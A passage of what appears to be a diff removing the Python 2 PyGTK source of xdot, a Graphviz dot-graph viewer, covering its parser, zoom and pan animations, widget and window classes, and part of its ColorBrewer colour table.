return - - x, y = self.parse_node_pos(pos) - w = float(attrs['width'])*72 - h = float(attrs['height'])*72 - shapes = [] - for attr in ("_draw_", "_ldraw_"): - if attr in attrs: - parser = XDotAttrParser(self, attrs[attr]) - shapes.extend(parser.parse()) - url = attrs.get('URL', None) - node = Node(x, y, w, h, shapes, url) - self.node_by_name[id] = node - if shapes: - self.nodes.append(node) - - def handle_edge(self, src_id, dst_id, attrs): - try: - pos = attrs['pos'] - except KeyError: - return - - points = self.parse_edge_pos(pos) - shapes = [] - for attr in ("_draw_", "_ldraw_", "_hdraw_", "_tdraw_", "_hldraw_", "_tldraw_"): - if attr in attrs: - parser = XDotAttrParser(self, attrs[attr]) - shapes.extend(parser.parse()) - if shapes: - src = self.node_by_name[src_id] - dst = self.node_by_name[dst_id] - self.edges.append(Edge(src, dst, points, shapes)) - - def parse(self): - DotParser.parse(self) - - return Graph(self.width, self.height, self.shapes, self.nodes, self.edges) - - def parse_node_pos(self, pos): - x, y = pos.split(",") - return self.transform(float(x), float(y)) - - def parse_edge_pos(self, pos): - points = [] - for entry in pos.split(' '): - fields = entry.split(',') - try: - x, y = fields - except ValueError: - # TODO: handle start/end points - continue - else: - points.append(self.transform(float(x), float(y))) - return points - - def transform(self, x, y): - # XXX: this is not the right place for this code - x = (x + self.xoffset)*self.xscale - y = (y + self.yoffset)*self.yscale - return x, y - - -class Animation(object): - - step = 0.03 # seconds - - def __init__(self, dot_widget): - self.dot_widget = dot_widget - self.timeout_id = None - - def start(self): - self.timeout_id = gobject.timeout_add(int(self.step * 1000), self.tick) - - def stop(self): - self.dot_widget.animation = NoAnimation(self.dot_widget) - if self.timeout_id is not None: - gobject.source_remove(self.timeout_id) - self.timeout_id = None - - def tick(self): - self.stop() - - -class NoAnimation(Animation): - - def start(self): - pass - - def stop(self): - pass - - -class LinearAnimation(Animation): - - duration = 0.6 - - def start(self): - self.started = time.time() - Animation.start(self) - - def tick(self): - t = (time.time() - self.started) / self.duration - self.animate(max(0, min(t, 1))) - return (t < 1) - - def animate(self, t): - pass - - -class MoveToAnimation(LinearAnimation): - - def __init__(self, dot_widget, target_x, target_y): - Animation.__init__(self, dot_widget) - self.source_x = dot_widget.x - self.source_y = dot_widget.y - self.target_x = target_x - self.target_y = target_y - - def animate(self, t): - sx, sy = self.source_x, self.source_y - tx, ty = self.target_x, self.target_y - self.dot_widget.x = tx * t + sx * (1-t) - self.dot_widget.y = ty * t + sy * (1-t) - self.dot_widget.queue_draw() - - -class ZoomToAnimation(MoveToAnimation): - - def __init__(self, dot_widget, target_x, target_y): - MoveToAnimation.__init__(self, dot_widget, target_x, target_y) - self.source_zoom = dot_widget.zoom_ratio - self.target_zoom = self.source_zoom - self.extra_zoom = 0 - - middle_zoom = 0.5 * (self.source_zoom + self.target_zoom) - - distance = math.hypot(self.source_x - self.target_x, - self.source_y - self.target_y) - rect = self.dot_widget.get_allocation() - visible = min(rect.width, rect.height) / self.dot_widget.zoom_ratio - visible *= 0.9 - if distance > 0: - desired_middle_zoom = visible / distance - self.extra_zoom = min(0, 4 * (desired_middle_zoom - middle_zoom)) - - def animate(self, t): - 
a, b, c = self.source_zoom, self.extra_zoom, self.target_zoom - self.dot_widget.zoom_ratio = c*t + b*t*(1-t) + a*(1-t) - self.dot_widget.zoom_to_fit_on_resize = False - MoveToAnimation.animate(self, t) - - -class DragAction(object): - - def __init__(self, dot_widget): - self.dot_widget = dot_widget - - def on_button_press(self, event): - self.startmousex = self.prevmousex = event.x - self.startmousey = self.prevmousey = event.y - self.start() - - def on_motion_notify(self, event): - if event.is_hint: - x, y, state = event.window.get_pointer() - else: - x, y, state = event.x, event.y, event.state - deltax = self.prevmousex - x - deltay = self.prevmousey - y - self.drag(deltax, deltay) - self.prevmousex = x - self.prevmousey = y - - def on_button_release(self, event): - self.stopmousex = event.x - self.stopmousey = event.y - self.stop() - - def draw(self, cr): - pass - - def start(self): - pass - - def drag(self, deltax, deltay): - pass - - def stop(self): - pass - - def abort(self): - pass - - -class NullAction(DragAction): - - def on_motion_notify(self, event): - if event.is_hint: - x, y, state = event.window.get_pointer() - else: - x, y, state = event.x, event.y, event.state - dot_widget = self.dot_widget - item = dot_widget.get_url(x, y) - if item is None: - item = dot_widget.get_jump(x, y) - if item is not None: - dot_widget.window.set_cursor(gtk.gdk.Cursor(gtk.gdk.HAND2)) - dot_widget.set_highlight(item.highlight) - else: - dot_widget.window.set_cursor(gtk.gdk.Cursor(gtk.gdk.ARROW)) - dot_widget.set_highlight(None) - - -class PanAction(DragAction): - - def start(self): - self.dot_widget.window.set_cursor(gtk.gdk.Cursor(gtk.gdk.FLEUR)) - - def drag(self, deltax, deltay): - self.dot_widget.x += deltax / self.dot_widget.zoom_ratio - self.dot_widget.y += deltay / self.dot_widget.zoom_ratio - self.dot_widget.queue_draw() - - def stop(self): - self.dot_widget.window.set_cursor(gtk.gdk.Cursor(gtk.gdk.ARROW)) - - abort = stop - - -class ZoomAction(DragAction): - - def drag(self, deltax, deltay): - self.dot_widget.zoom_ratio *= 1.005 ** (deltax + deltay) - self.dot_widget.zoom_to_fit_on_resize = False - self.dot_widget.queue_draw() - - def stop(self): - self.dot_widget.queue_draw() - - -class ZoomAreaAction(DragAction): - - def drag(self, deltax, deltay): - self.dot_widget.queue_draw() - - def draw(self, cr): - cr.save() - cr.set_source_rgba(.5, .5, 1.0, 0.25) - cr.rectangle(self.startmousex, self.startmousey, - self.prevmousex - self.startmousex, - self.prevmousey - self.startmousey) - cr.fill() - cr.set_source_rgba(.5, .5, 1.0, 1.0) - cr.set_line_width(1) - cr.rectangle(self.startmousex - .5, self.startmousey - .5, - self.prevmousex - self.startmousex + 1, - self.prevmousey - self.startmousey + 1) - cr.stroke() - cr.restore() - - def stop(self): - x1, y1 = self.dot_widget.window2graph(self.startmousex, - self.startmousey) - x2, y2 = self.dot_widget.window2graph(self.stopmousex, - self.stopmousey) - self.dot_widget.zoom_to_area(x1, y1, x2, y2) - - def abort(self): - self.dot_widget.queue_draw() - - -class DotWidget(gtk.DrawingArea): - """PyGTK widget that draws dot graphs.""" - - __gsignals__ = { - 'expose-event': 'override', - 'clicked' : (gobject.SIGNAL_RUN_LAST, gobject.TYPE_NONE, (gobject.TYPE_STRING, gtk.gdk.Event)) - } - - filter = 'dot' - - def __init__(self): - gtk.DrawingArea.__init__(self) - - self.graph = Graph() - self.openfilename = None - - self.set_flags(gtk.CAN_FOCUS) - - self.add_events(gtk.gdk.BUTTON_PRESS_MASK | gtk.gdk.BUTTON_RELEASE_MASK) - 
self.connect("button-press-event", self.on_area_button_press) - self.connect("button-release-event", self.on_area_button_release) - self.add_events(gtk.gdk.POINTER_MOTION_MASK | gtk.gdk.POINTER_MOTION_HINT_MASK | gtk.gdk.BUTTON_RELEASE_MASK) - self.connect("motion-notify-event", self.on_area_motion_notify) - self.connect("scroll-event", self.on_area_scroll_event) - self.connect("size-allocate", self.on_area_size_allocate) - - self.connect('key-press-event', self.on_key_press_event) - - self.x, self.y = 0.0, 0.0 - self.zoom_ratio = 1.0 - self.zoom_to_fit_on_resize = False - self.animation = NoAnimation(self) - self.drag_action = NullAction(self) - self.presstime = None - self.highlight = None - - def set_filter(self, filter): - self.filter = filter - - def set_dotcode(self, dotcode, filename=''): - if isinstance(dotcode, unicode): - dotcode = dotcode.encode('utf8') - p = subprocess.Popen( - [self.filter, '-Txdot'], - stdin=subprocess.PIPE, - stdout=subprocess.PIPE, - stderr=subprocess.PIPE, - shell=False, - universal_newlines=True - ) - xdotcode, error = p.communicate(dotcode) - if p.returncode != 0: - dialog = gtk.MessageDialog(type=gtk.MESSAGE_ERROR, - message_format=error, - buttons=gtk.BUTTONS_OK) - dialog.set_title('Dot Viewer') - dialog.run() - dialog.destroy() - return False - try: - self.set_xdotcode(xdotcode) - except ParseError, ex: - dialog = gtk.MessageDialog(type=gtk.MESSAGE_ERROR, - message_format=str(ex), - buttons=gtk.BUTTONS_OK) - dialog.set_title('Dot Viewer') - dialog.run() - dialog.destroy() - return False - else: - self.openfilename = filename - return True - - def set_xdotcode(self, xdotcode): - #print xdotcode - parser = XDotParser(xdotcode) - self.graph = parser.parse() - self.zoom_image(self.zoom_ratio, center=True) - - def reload(self): - if self.openfilename is not None: - try: - fp = file(self.openfilename, 'rt') - self.set_dotcode(fp.read(), self.openfilename) - fp.close() - except IOError: - pass - - def do_expose_event(self, event): - cr = self.window.cairo_create() - - # set a clip region for the expose event - cr.rectangle( - event.area.x, event.area.y, - event.area.width, event.area.height - ) - cr.clip() - - cr.set_source_rgba(1.0, 1.0, 1.0, 1.0) - cr.paint() - - cr.save() - rect = self.get_allocation() - cr.translate(0.5*rect.width, 0.5*rect.height) - cr.scale(self.zoom_ratio, self.zoom_ratio) - cr.translate(-self.x, -self.y) - - self.graph.draw(cr, highlight_items=self.highlight) - cr.restore() - - self.drag_action.draw(cr) - - return False - - def get_current_pos(self): - return self.x, self.y - - def set_current_pos(self, x, y): - self.x = x - self.y = y - self.queue_draw() - - def set_highlight(self, items): - if self.highlight != items: - self.highlight = items - self.queue_draw() - - def zoom_image(self, zoom_ratio, center=False, pos=None): - if center: - self.x = self.graph.width/2 - self.y = self.graph.height/2 - elif pos is not None: - rect = self.get_allocation() - x, y = pos - x -= 0.5*rect.width - y -= 0.5*rect.height - self.x += x / self.zoom_ratio - x / zoom_ratio - self.y += y / self.zoom_ratio - y / zoom_ratio - self.zoom_ratio = zoom_ratio - self.zoom_to_fit_on_resize = False - self.queue_draw() - - def zoom_to_area(self, x1, y1, x2, y2): - rect = self.get_allocation() - width = abs(x1 - x2) - height = abs(y1 - y2) - self.zoom_ratio = min( - float(rect.width)/float(width), - float(rect.height)/float(height) - ) - self.zoom_to_fit_on_resize = False - self.x = (x1 + x2) / 2 - self.y = (y1 + y2) / 2 - self.queue_draw() - - def 
zoom_to_fit(self): - rect = self.get_allocation() - rect.x += self.ZOOM_TO_FIT_MARGIN - rect.y += self.ZOOM_TO_FIT_MARGIN - rect.width -= 2 * self.ZOOM_TO_FIT_MARGIN - rect.height -= 2 * self.ZOOM_TO_FIT_MARGIN - zoom_ratio = min( - float(rect.width)/float(self.graph.width), - float(rect.height)/float(self.graph.height) - ) - self.zoom_image(zoom_ratio, center=True) - self.zoom_to_fit_on_resize = True - - ZOOM_INCREMENT = 1.25 - ZOOM_TO_FIT_MARGIN = 12 - - def on_zoom_in(self, action): - self.zoom_image(self.zoom_ratio * self.ZOOM_INCREMENT) - - def on_zoom_out(self, action): - self.zoom_image(self.zoom_ratio / self.ZOOM_INCREMENT) - - def on_zoom_fit(self, action): - self.zoom_to_fit() - - def on_zoom_100(self, action): - self.zoom_image(1.0) - - POS_INCREMENT = 100 - - def on_key_press_event(self, widget, event): - if event.keyval == gtk.keysyms.Left: - self.x -= self.POS_INCREMENT/self.zoom_ratio - self.queue_draw() - return True - if event.keyval == gtk.keysyms.Right: - self.x += self.POS_INCREMENT/self.zoom_ratio - self.queue_draw() - return True - if event.keyval == gtk.keysyms.Up: - self.y -= self.POS_INCREMENT/self.zoom_ratio - self.queue_draw() - return True - if event.keyval == gtk.keysyms.Down: - self.y += self.POS_INCREMENT/self.zoom_ratio - self.queue_draw() - return True - if event.keyval == gtk.keysyms.Page_Up: - self.zoom_image(self.zoom_ratio * self.ZOOM_INCREMENT) - self.queue_draw() - return True - if event.keyval == gtk.keysyms.Page_Down: - self.zoom_image(self.zoom_ratio / self.ZOOM_INCREMENT) - self.queue_draw() - return True - if event.keyval == gtk.keysyms.Escape: - self.drag_action.abort() - self.drag_action = NullAction(self) - return True - if event.keyval == gtk.keysyms.r: - self.reload() - return True - if event.keyval == gtk.keysyms.q: - gtk.main_quit() - return True - return False - - def get_drag_action(self, event): - state = event.state - if event.button in (1, 2): # left or middle button - if state & gtk.gdk.CONTROL_MASK: - return ZoomAction - elif state & gtk.gdk.SHIFT_MASK: - return ZoomAreaAction - else: - return PanAction - return NullAction - - def on_area_button_press(self, area, event): - self.animation.stop() - self.drag_action.abort() - action_type = self.get_drag_action(event) - self.drag_action = action_type(self) - self.drag_action.on_button_press(event) - self.presstime = time.time() - self.pressx = event.x - self.pressy = event.y - return False - - def is_click(self, event, click_fuzz=4, click_timeout=1.0): - assert event.type == gtk.gdk.BUTTON_RELEASE - if self.presstime is None: - # got a button release without seeing the press? - return False - # XXX instead of doing this complicated logic, shouldn't we listen - # for gtk's clicked event instead? 
- deltax = self.pressx - event.x - deltay = self.pressy - event.y - return (time.time() < self.presstime + click_timeout - and math.hypot(deltax, deltay) < click_fuzz) - - def on_area_button_release(self, area, event): - self.drag_action.on_button_release(event) - self.drag_action = NullAction(self) - if event.button == 1 and self.is_click(event): - x, y = int(event.x), int(event.y) - url = self.get_url(x, y) - if url is not None: - self.emit('clicked', unicode(url.url), event) - else: - jump = self.get_jump(x, y) - if jump is not None: - self.animate_to(jump.x, jump.y) - - return True - if event.button == 1 or event.button == 2: - return True - return False - - def on_area_scroll_event(self, area, event): - if event.direction == gtk.gdk.SCROLL_UP: - self.zoom_image(self.zoom_ratio * self.ZOOM_INCREMENT, - pos=(event.x, event.y)) - return True - if event.direction == gtk.gdk.SCROLL_DOWN: - self.zoom_image(self.zoom_ratio / self.ZOOM_INCREMENT, - pos=(event.x, event.y)) - return True - return False - - def on_area_motion_notify(self, area, event): - self.drag_action.on_motion_notify(event) - return True - - def on_area_size_allocate(self, area, allocation): - if self.zoom_to_fit_on_resize: - self.zoom_to_fit() - - def animate_to(self, x, y): - self.animation = ZoomToAnimation(self, x, y) - self.animation.start() - - def window2graph(self, x, y): - rect = self.get_allocation() - x -= 0.5*rect.width - y -= 0.5*rect.height - x /= self.zoom_ratio - y /= self.zoom_ratio - x += self.x - y += self.y - return x, y - - def get_url(self, x, y): - x, y = self.window2graph(x, y) - return self.graph.get_url(x, y) - - def get_jump(self, x, y): - x, y = self.window2graph(x, y) - return self.graph.get_jump(x, y) - - -class DotWindow(gtk.Window): - - ui = ''' - - - - - - - - - - - - ''' - - def __init__(self): - gtk.Window.__init__(self) - - self.graph = Graph() - - window = self - - window.set_title('Dot Viewer') - window.set_default_size(512, 512) - vbox = gtk.VBox() - window.add(vbox) - - self.widget = DotWidget() - - # Create a UIManager instance - uimanager = self.uimanager = gtk.UIManager() - - # Add the accelerator group to the toplevel window - accelgroup = uimanager.get_accel_group() - window.add_accel_group(accelgroup) - - # Create an ActionGroup - actiongroup = gtk.ActionGroup('Actions') - self.actiongroup = actiongroup - - # Create actions - actiongroup.add_actions(( - ('Open', gtk.STOCK_OPEN, None, None, None, self.on_open), - ('Reload', gtk.STOCK_REFRESH, None, None, None, self.on_reload), - ('ZoomIn', gtk.STOCK_ZOOM_IN, None, None, None, self.widget.on_zoom_in), - ('ZoomOut', gtk.STOCK_ZOOM_OUT, None, None, None, self.widget.on_zoom_out), - ('ZoomFit', gtk.STOCK_ZOOM_FIT, None, None, None, self.widget.on_zoom_fit), - ('Zoom100', gtk.STOCK_ZOOM_100, None, None, None, self.widget.on_zoom_100), - )) - - # Add the actiongroup to the uimanager - uimanager.insert_action_group(actiongroup, 0) - - # Add a UI descrption - uimanager.add_ui_from_string(self.ui) - - # Create a Toolbar - toolbar = uimanager.get_widget('/ToolBar') - vbox.pack_start(toolbar, False) - - vbox.pack_start(self.widget) - - self.set_focus(self.widget) - - self.show_all() - - def update(self, filename): - import os - if not hasattr(self, "last_mtime"): - self.last_mtime = None - - current_mtime = os.stat(filename).st_mtime - if current_mtime != self.last_mtime: - self.last_mtime = current_mtime - self.open_file(filename) - - return True - - def set_filter(self, filter): - self.widget.set_filter(filter) - - def set_dotcode(self, 
dotcode, filename=''): - if self.widget.set_dotcode(dotcode, filename): - self.set_title(os.path.basename(filename) + ' - Dot Viewer') - self.widget.zoom_to_fit() - - def set_xdotcode(self, xdotcode, filename=''): - if self.widget.set_xdotcode(xdotcode): - self.set_title(os.path.basename(filename) + ' - Dot Viewer') - self.widget.zoom_to_fit() - - def open_file(self, filename): - try: - fp = file(filename, 'rt') - self.set_dotcode(fp.read(), filename) - fp.close() - except IOError, ex: - dlg = gtk.MessageDialog(type=gtk.MESSAGE_ERROR, - message_format=str(ex), - buttons=gtk.BUTTONS_OK) - dlg.set_title('Dot Viewer') - dlg.run() - dlg.destroy() - - def on_open(self, action): - chooser = gtk.FileChooserDialog(title="Open dot File", - action=gtk.FILE_CHOOSER_ACTION_OPEN, - buttons=(gtk.STOCK_CANCEL, - gtk.RESPONSE_CANCEL, - gtk.STOCK_OPEN, - gtk.RESPONSE_OK)) - chooser.set_default_response(gtk.RESPONSE_OK) - filter = gtk.FileFilter() - filter.set_name("Graphviz dot files") - filter.add_pattern("*.dot") - chooser.add_filter(filter) - filter = gtk.FileFilter() - filter.set_name("All files") - filter.add_pattern("*") - chooser.add_filter(filter) - if chooser.run() == gtk.RESPONSE_OK: - filename = chooser.get_filename() - chooser.destroy() - self.open_file(filename) - else: - chooser.destroy() - - def on_reload(self, action): - self.widget.reload() - - -def main(): - import optparse - - parser = optparse.OptionParser( - usage='\n\t%prog [file]', - version='%%prog %s' % __version__) - parser.add_option( - '-f', '--filter', - type='choice', choices=('dot', 'neato', 'twopi', 'circo', 'fdp'), - dest='filter', default='dot', - help='graphviz filter: dot, neato, twopi, circo, or fdp [default: %default]') - - (options, args) = parser.parse_args(sys.argv[1:]) - if len(args) > 1: - parser.error('incorrect number of arguments') - - win = DotWindow() - win.connect('destroy', gtk.main_quit) - win.set_filter(options.filter) - if len(args) >= 1: - if args[0] == '-': - win.set_dotcode(sys.stdin.read()) - else: - win.open_file(args[0]) - gobject.timeout_add(1000, win.update, args[0]) - gtk.main() - - -# Apache-Style Software License for ColorBrewer software and ColorBrewer Color -# Schemes, Version 1.1 -# -# Copyright (c) 2002 Cynthia Brewer, Mark Harrower, and The Pennsylvania State -# University. All rights reserved. -# -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions are met: -# -# 1. Redistributions as source code must retain the above copyright notice, -# this list of conditions and the following disclaimer. -# -# 2. The end-user documentation included with the redistribution, if any, -# must include the following acknowledgment: -# -# This product includes color specifications and designs developed by -# Cynthia Brewer (http://colorbrewer.org/). -# -# Alternately, this acknowledgment may appear in the software itself, if and -# wherever such third-party acknowledgments normally appear. -# -# 3. The name "ColorBrewer" must not be used to endorse or promote products -# derived from this software without prior written permission. For written -# permission, please contact Cynthia Brewer at cbrewer@psu.edu. -# -# 4. Products derived from this software may not be called "ColorBrewer", -# nor may "ColorBrewer" appear in their name, without prior written -# permission of Cynthia Brewer. 
-# -# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESSED OR IMPLIED WARRANTIES, -# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -# FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL CYNTHIA -# BREWER, MARK HARROWER, OR THE PENNSYLVANIA STATE UNIVERSITY BE LIABLE FOR ANY -# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND -# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -brewer_colors = { - 'accent3': [(127, 201, 127), (190, 174, 212), (253, 192, 134)], - 'accent4': [(127, 201, 127), (190, 174, 212), (253, 192, 134), (255, 255, 153)], - 'accent5': [(127, 201, 127), (190, 174, 212), (253, 192, 134), (255, 255, 153), (56, 108, 176)], - 'accent6': [(127, 201, 127), (190, 174, 212), (253, 192, 134), (255, 255, 153), (56, 108, 176), (240, 2, 127)], - 'accent7': [(127, 201, 127), (190, 174, 212), (253, 192, 134), (255, 255, 153), (56, 108, 176), (240, 2, 127), (191, 91, 23)], - 'accent8': [(127, 201, 127), (190, 174, 212), (253, 192, 134), (255, 255, 153), (56, 108, 176), (240, 2, 127), (191, 91, 23), (102, 102, 102)], - 'blues3': [(222, 235, 247), (158, 202, 225), (49, 130, 189)], - 'blues4': [(239, 243, 255), (189, 215, 231), (107, 174, 214), (33, 113, 181)], - 'blues5': [(239, 243, 255), (189, 215, 231), (107, 174, 214), (49, 130, 189), (8, 81, 156)], - 'blues6': [(239, 243, 255), (198, 219, 239), (158, 202, 225), (107, 174, 214), (49, 130, 189), (8, 81, 156)], - 'blues7': [(239, 243, 255), (198, 219, 239), (158, 202, 225), (107, 174, 214), (66, 146, 198), (33, 113, 181), (8, 69, 148)], - 'blues8': [(247, 251, 255), (222, 235, 247), (198, 219, 239), (158, 202, 225), (107, 174, 214), (66, 146, 198), (33, 113, 181), (8, 69, 148)], - 'blues9': [(247, 251, 255), (222, 235, 247), (198, 219, 239), (158, 202, 225), (107, 174, 214), (66, 146, 198), (33, 113, 181), (8, 81, 156), (8, 48, 107)], - 'brbg10': [(84, 48, 5), (0, 60, 48), (140, 81, 10), (191, 129, 45), (223, 194, 125), (246, 232, 195), (199, 234, 229), (128, 205, 193), (53, 151, 143), (1, 102, 94)], - 'brbg11': [(84, 48, 5), (1, 102, 94), (0, 60, 48), (140, 81, 10), (191, 129, 45), (223, 194, 125), (246, 232, 195), (245, 245, 245), (199, 234, 229), (128, 205, 193), (53, 151, 143)], - 'brbg3': [(216, 179, 101), (245, 245, 245), (90, 180, 172)], - 'brbg4': [(166, 97, 26), (223, 194, 125), (128, 205, 193), (1, 133, 113)], - 'brbg5': [(166, 97, 26), (223, 194, 125), (245, 245, 245), (128, 205, 193), (1, 133, 113)], - 'brbg6': [(140, 81, 10), (216, 179, 101), (246, 232, 195), (199, 234, 229), (90, 180, 172), (1, 102, 94)], - 'brbg7': [(140, 81, 10), (216, 179, 101), (246, 232, 195), (245, 245, 245), (199, 234, 229), (90, 180, 172), (1, 102, 94)], - 'brbg8': [(140, 81, 10), (191, 129, 45), (223, 194, 125), (246, 232, 195), (199, 234, 229), (128, 205, 193), (53, 151, 143), (1, 102, 94)], - 'brbg9': [(140, 81, 10), (191, 129, 45), (223, 194, 125), (246, 232, 195), (245, 245, 245), (199, 234, 229), (128, 205, 193), (53, 151, 143), (1, 102, 94)], - 'bugn3': [(229, 245, 249), (153, 216, 201), (44, 162, 95)], - 'bugn4': [(237, 248, 251), (178, 226, 226), (102, 194, 164), (35, 139, 69)], - 'bugn5': [(237, 248, 251), (178, 226, 226), (102, 194, 164), (44, 
162, 95), (0, 109, 44)], - 'bugn6': [(237, 248, 251), (204, 236, 230), (153, 216, 201), (102, 194, 164), (44, 162, 95), (0, 109, 44)], - 'bugn7': [(237, 248, 251), (204, 236, 230), (153, 216, 201), (102, 194, 164), (65, 174, 118), (35, 139, 69), (0, 88, 36)], - 'bugn8': [(247, 252, 253), (229, 245, 249), (204, 236, 230), (153, 216, 201), (102, 194, 164), (65, 174, 118), (35, 139, 69), (0, 88, 36)], - 'bugn9': [(247, 252, 253), (229, 245, 249), (204, 236, 230), (153, 216, 201), (102, 194, 164), (65, 174, 118), (35, 139, 69), (0, 109, 44), (0, 68, 27)], - 'bupu3': [(224, 236, 244), (158, 188, 218), (136, 86, 167)], - 'bupu4': [(237, 248, 251), (179, 205, 227), (140, 150, 198), (136, 65, 157)], - 'bupu5': [(237, 248, 251), (179, 205, 227), (140, 150, 198), (136, 86, 167), (129, 15, 124)], - 'bupu6': [(237, 248, 251), (191, 211, 230), (158, 188, 218), (140, 150, 198), (136, 86, 167), (129, 15, 124)], - 'bupu7': [(237, 248, 251), (191, 211, 230), (158, 188, 218), (140, 150, 198), (140, 107, 177), (136, 65, 157), (110, 1, 107)], - 'bupu8': [(247, 252, 253), (224, 236, 244), (191, 211, 230), (158, 188, 218), (140, 150, 198), (140, 107, 177), (136, 65, 157), (110, 1, 107)], - 'bupu9': [(247, 252, 253), (224, 236, 244), (191, 211, 230), (158, 188, 218), (140, 150, 198), (140, 107, 177), (136, 65, 157), (129, 15, 124), (77, 0, 75)], - 'dark23': [(27, 158, 119), (217, 95, 2), (117, 112, 179)], - 'dark24': [(27, 158, 119), (217, 95, 2), (117, 112, 179), (231, 41, 138)], - 'dark25': [(27, 158, 119), (217, 95, 2), (117, 112, 179), (231, 41, 138), (102, 166, 30)], - 'dark26': [(27, 158, 119), (217, 95, 2), (117, 112, 179), (231, 41, 138), (102, 166, 30), (230, 171, 2)], - 'dark27': [(27, 158, 119), (217, 95, 2), (117, 112, 179), (231, 41, 138), (102, 166, 30), (230, 171, 2), (166, 118, 29)], - 'dark28': [(27, 158, 119), (217, 95, 2), (117, 112, 179), (231, 41, 138), (102, 166, 30), (230, 171, 2), (166, 118, 29), (102, 102, 102)], - 'gnbu3': [(224, 243, 219), (168, 221, 181), (67, 162, 202)], - 'gnbu4': [(240, 249, 232), (186, 228, 188), (123, 204, 196), (43, 140, 190)], - 'gnbu5': [(240, 249, 232), (186, 228, 188), (123, 204, 196), (67, 162, 202), (8, 104, 172)], - 'gnbu6': [(240, 249, 232), (204, 235, 197), (168, 221, 181), (123, 204, 196), (67, 162, 202), (8, 104, 172)], - 'gnbu7': [(240, 249, 232), (204, 235, 197), (168, 221, 181), (123, 204, 196), (78, 179, 211), (43, 140, 190), (8, 88, 158)], - 'gnbu8': [(247, 252, 240), (224, 243, 219), (204, 235, 197), (168, 221, 181), (123, 204, 196), (78, 179, 211), (43, 140, 190), (8, 88, 158)], - 'gnbu9': [(247, 252, 240), (224, 243, 219), (204, 235, 197), (168, 221, 181), (123, 204, 196), (78, 179, 211), (43, 140, 190), (8, 104, 172), (8, 64, 129)], - 'greens3': [(229, 245, 224), (161, 217, 155), (49, 163, 84)], - 'greens4': [(237, 248, 233), (186, 228, 179), (116, 196, 118), (35, 139, 69)], - 'greens5': [(237, 248, 233), (186, 228, 179), (116, 196, 118), (49, 163, 84), (0, 109, 44)], - 'greens6': [(237, 248, 233), (199, 233, 192), (161, 217, 155), (116, 196, 118), (49, 163, 84), (0, 109, 44)], - 'greens7': [(237, 248, 233), (199, 233, 192), (161, 217, 155), (116, 196, 118), (65, 171, 93), (35, 139, 69), (0, 90, 50)], - 'greens8': [(247, 252, 245), (229, 245, 224), (199, 233, 192), (161, 217, 155), (116, 196, 118), (65, 171, 93), (35, 139, 69), (0, 90, 50)], - 'greens9': [(247, 252, 245), (229, 245, 224), (199, 233, 192), (161, 217, 155), (116, 196, 118), (65, 171, 93), (35, 139, 69), (0, 109, 44), (0, 68, 27)], - 'greys3': [(240, 240, 240), (189, 189, 189), 
(99, 99, 99)], - 'greys4': [(247, 247, 247), (204, 204, 204), (150, 150, 150), (82, 82, 82)], - 'greys5': [(247, 247, 247), (204, 204, 204), (150, 150, 150), (99, 99, 99), (37, 37, 37)], - 'greys6': [(247, 247, 247), (217, 217, 217), (189, 189, 189), (150, 150, 150), (99, 99, 99), (37, 37, 37)], - 'greys7': [(247, 247, 247), (217, 217, 217), (189, 189, 189), (150, 150, 150), (115, 115, 115), (82, 82, 82), (37, 37, 37)], - 'greys8': [(255, 255, 255), (240, 240, 240), (217, 217, 217), (189, 189, 189), (150, 150, 150), (115, 115, 115), (82, 82, 82), (37, 37, 37)], - 'greys9': [(255, 255, 255), (240, 240, 240), (217, 217, 217), (189, 189, 189), (150, 150, 150), (115, 115, 115), (82, 82, 82), (37, 37, 37), (0, 0, 0)], - 'oranges3': [(254, 230, 206), (253, 174, 107), (230, 85, 13)], - 'oranges4': [(254, 237, 222), (253, 190, 133), (253, 141, 60), (217, 71, 1)], - 'oranges5': [(254, 237, 222), (253, 190, 133), (253, 141, 60), (230, 85, 13), (166, 54, 3)], - 'oranges6': [(254, 237, 222), (253, 208, 162), (253, 174, 107), (253, 141, 60), (230, 85, 13), (166, 54, 3)], - 'oranges7': [(254, 237, 222), (253, 208, 162), (253, 174, 107), (253, 141, 60), (241, 105, 19), (217, 72, 1), (140, 45, 4)], - 'oranges8': [(255, 245, 235), (254, 230, 206), (253, 208, 162), (253, 174, 107), (253, 141, 60), (241, 105, 19), (217, 72, 1), (140, 45, 4)], - 'oranges9': [(255, 245, 235), (254, 230, 206), (253, 208, 162), (253, 174, 107), (253, 141, 60), (241, 105, 19), (217, 72, 1), (166, 54, 3), (127, 39, 4)], - 'orrd3': [(254, 232, 200), (253, 187, 132), (227, 74, 51)], - 'orrd4': [(254, 240, 217), (253, 204, 138), (252, 141, 89), (215, 48, 31)], - 'orrd5': [(254, 240, 217), (253, 204, 138), (252, 141, 89), (227, 74, 51), (179, 0, 0)], - 'orrd6': [(254, 240, 217), (253, 212, 158), (253, 187, 132), (252, 141, 89), (227, 74, 51), (179, 0, 0)], - 'orrd7': [(254, 240, 217), (253, 212, 158), (253, 187, 132), (252, 141, 89), (239, 101, 72), (215, 48, 31), (153, 0, 0)], - 'orrd8': [(255, 247, 236), (254, 232, 200), (253, 212, 158), (253, 187, 132), (252, 141, 89), (239, 101, 72), (215, 48, 31), (153, 0, 0)], - 'orrd9': [(255, 247, 236), (254, 232, 200), (253, 212, 158), (253, 187, 132), (252, 141, 89), (239, 101, 72), (215, 48, 31), (179, 0, 0), (127, 0, 0)], - 'paired10': [(166, 206, 227), (106, 61, 154), (31, 120, 180), (178, 223, 138), (51, 160, 44), (251, 154, 153), (227, 26, 28), (253, 191, 111), (255, 127, 0), (202, 178, 214)], - 'paired11': [(166, 206, 227), (106, 61, 154), (255, 255, 153), (31, 120, 180), (178, 223, 138), (51, 160, 44), 